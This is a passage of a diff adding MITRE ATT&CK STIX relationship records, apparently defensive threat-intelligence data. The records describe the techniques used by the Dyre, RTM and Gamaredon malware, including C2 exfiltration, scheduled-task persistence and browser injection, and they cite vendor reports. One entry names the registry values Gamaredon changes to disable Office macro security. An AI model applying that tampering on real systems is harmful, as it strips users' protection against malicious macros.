+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify the users on a compromised host.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--143dbc8a-0b00-4510-aacf-96437d87ea2b",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.503Z",
+ "created": "2020-06-15T20:49:55.503Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify network settings on a compromised host.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--03732f50-c46c-49f1-bd47-cc56bb96cf23",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.553Z",
+ "created": "2020-06-15T20:49:55.553Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to send information staged on a compromised host externally to C2.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--ed543016-8c64-42dd-89e1-7c6a49791d80",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.561Z",
+ "created": "2020-06-15T20:49:55.561Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify installed programs on a compromised host.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--e4489924-d87d-4a18-8702-418361f6a2bb",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.564Z",
+ "created": "2020-06-15T20:49:55.564Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has been delivered with encrypted resources and must be unpacked for execution.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--c6467df1-e2fd-4fff-b647-606be50a9078",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.569Z",
+ "created": "2020-06-15T20:49:55.569Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to create files in a TEMP folder to act as a database to store information.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--2d82c7df-baa0-4268-855d-03df92fa35ab",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.571Z",
+ "created": "2020-06-15T20:49:55.571Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify running services on a compromised host.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--f79947b2-49bc-4658-b93c-3aa9dbf9cd5e",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.573Z",
+ "created": "2020-06-15T20:49:55.573Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to achieve persistence by adding a new task in the task scheduler to run every minute.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--57828888-a833-44c7-af2c-e250d799a9bc",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.576Z",
+ "created": "2020-06-15T20:49:55.576Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify the computer name, OS version, and hardware configuration on a compromised host.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--c1a4334d-8975-4ca2-8734-d6c26e36702a",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.578Z",
+ "created": "2020-06-15T20:49:55.578Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) has the ability to directly inject its code into the web browser process.(Citation: Malwarebytes Dyreza November 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--d9c19c4a-a2e3-41f9-b508-d0d008c08993",
+ "type": "relationship",
+ "modified": "2020-06-15T20:49:55.581Z",
+ "created": "2020-06-15T20:49:55.581Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Redaman October 2019",
+ "url": "https://research.checkpoint.com/2019/ponys-cc-servers-hidden-inside-the-bitcoin-blockchain/",
+ "description": "Eisenkraft, K., Olshtein, A. (2019, October 17). Pony\u2019s C&C servers hidden inside the Bitcoin blockchain. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) has resolved [Pony](https://attack.mitre.org/software/S0453) C2 server IP addresses by either converting Bitcoin blockchain transaction data to specific octets, or accessing IP addresses directly within the Namecoin blockchain.(Citation: CheckPoint Redaman October 2019)(Citation: Unit42 Redaman January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--25eb9cd3-80e1-4116-bfd3-fa3819dc2079",
+ "type": "relationship",
+ "modified": "2020-06-16T20:51:14.350Z",
+ "created": "2020-06-16T15:37:50.908Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4",
+ "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--761c328c-c7fe-4968-875d-537b99c4a605",
+ "type": "relationship",
+ "modified": "2020-06-16T17:23:06.601Z",
+ "created": "2020-06-16T17:23:06.601Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047)'s malware can take screenshots of the compromised computer every minute.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--3a9117f6-9244-4d09-a69b-43afbb4d2998",
+ "type": "relationship",
+ "modified": "2020-06-16T17:53:18.390Z",
+ "created": "2020-06-16T17:53:18.390Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has collected files from infected systems and uploaded them to a C2 server.(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--430afd29-f2c0-43d3-b7bf-e7a549960254",
+ "type": "relationship",
+ "modified": "2020-06-16T17:53:18.764Z",
+ "created": "2020-06-16T17:53:18.764Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware can insert malicious macros into documents using a Microsoft.Office.Interop object.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--69513daf-2acd-4b04-a7be-9f31174a2ae9",
+ "type": "relationship",
+ "modified": "2020-06-22T18:27:32.047Z",
+ "created": "2020-06-16T17:53:18.768Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used GitHub repositories for downloaders which will be obtained by the group's .NET executable on the compromised system.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--fa7887c3-d49d-4499-9ee4-f9a504ce7dec",
+ "type": "relationship",
+ "modified": "2020-06-22T18:52:36.952Z",
+ "created": "2020-06-16T17:53:18.771Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has created a scheduled task to launch an executable every 10 minutes.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--d65c9c85-2206-46c0-b55b-4fe2bd022c41",
+ "type": "relationship",
+ "modified": "2020-06-16T17:53:18.776Z",
+ "created": "2020-06-16T17:53:18.776Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has compiled the source code for a downloader directly on the infected system using the built-in Microsoft.CSharp.CSharpCodeProvider class.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2278eb19-1ff4-4406-ab79-03108732330c",
+ "type": "relationship",
+ "modified": "2020-06-16T17:53:18.779Z",
+ "created": "2020-06-16T17:53:18.779Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has obfuscated .NET executables by inserting junk code.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--28c17b23-901c-46d5-84f2-544401f68d83",
+ "type": "relationship",
+ "modified": "2020-06-16T17:53:18.782Z",
+ "created": "2020-06-16T17:53:18.782Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) macros can scan for Microsoft Word and Excel files to inject with additional malicious macros.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--16b915ff-7bf5-4032-b39a-9c8073847d77",
+ "type": "relationship",
+ "modified": "2020-06-16T17:53:18.787Z",
+ "created": "2020-06-16T17:53:18.787Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has delivered macros which can tamper with Microsoft Office security settings.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--7464b3a1-f7ab-481b-97d4-c98199e0a387",
+ "type": "relationship",
+ "modified": "2020-06-16T17:53:18.825Z",
+ "created": "2020-06-16T17:53:18.825Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used an Outlook VBA module on infected systems to send phishing emails with malicious attachments to other employees within the organization.(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--109bbda3-f97a-4067-81d6-ed635f251282",
+ "type": "relationship",
+ "modified": "2020-06-22T19:08:12.489Z",
+ "created": "2020-06-16T17:53:18.964Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has removed security settings for VBA macro execution by changing registry values HKCU\\Software\\Microsoft\\Office\\<version>\\<product>\\Security\\VBAWarnings and HKCU\\Software\\Microsoft\\Office\\<version>\\<product>\\Security\\AccessVBOM.(Citation: ESET Gamaredon June 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--5edb6931-3262-40a9-acce-3016ac4153d4",
+ "type": "relationship",
+ "modified": "2020-06-22T21:18:35.700Z",
+ "created": "2020-06-16T17:53:19.061Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has delivered self-extracting 7z archive files within malicious document attachments.(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--dd84b767-1623-421b-8f31-048924be5f17",
+ "type": "relationship",
+ "modified": "2020-06-16T17:53:19.063Z",
+ "created": "2020-06-16T17:53:19.063Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8",
+ "target_ref": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4",
+ "relationship_type": "mitigates",
+ "description": "Routinely check user permissions to ensure only the expected users have the capability to delete new instances.",
+ "id": "relationship--ba3d7819-9e07-4d90-93f1-e5fe9c63201f",
+ "type": "relationship",
+ "modified": "2020-06-17T19:53:14.984Z",
+ "created": "2020-06-16T18:32:29.496Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
+ "target_ref": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4",
+ "relationship_type": "mitigates",
+ "description": "Limit permissions for deleting new instances in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.(Citation: Mandiant M-Trends 2020)",
+ "id": "relationship--393a7e7b-0fe7-4b93-920f-fc1b62652c5a",
+ "external_references": [
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
+ }
+ ],
+ "type": "relationship",
+ "modified": "2020-06-17T19:53:15.029Z",
+ "created": "2020-06-16T18:32:29.507Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1",
+ "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--8b66ef05-63ad-4b12-b6b3-9a44475d781c",
+ "type": "relationship",
+ "modified": "2020-06-16T18:42:20.836Z",
+ "created": "2020-06-16T18:42:20.836Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--3b4121aa-fc8b-40c8-ac4f-afcb5838b72c",
+ "target_ref": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1",
+ "relationship_type": "revoked-by",
+ "id": "relationship--a03f53c2-4445-4ca5-ab2a-624afcbb9ea4",
+ "type": "relationship",
+ "modified": "2020-06-16T18:44:16.269Z",
+ "created": "2020-06-16T18:44:16.269Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) has initiated connections to external domains using HTTPS.(Citation: Unit42 Redaman January 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--b1c26420-ee32-44db-9158-781d38d7cc3b",
+ "type": "relationship",
+ "modified": "2020-06-16T20:51:12.866Z",
+ "created": "2020-06-16T20:51:12.866Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "external_references": [
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
+ }
+ ],
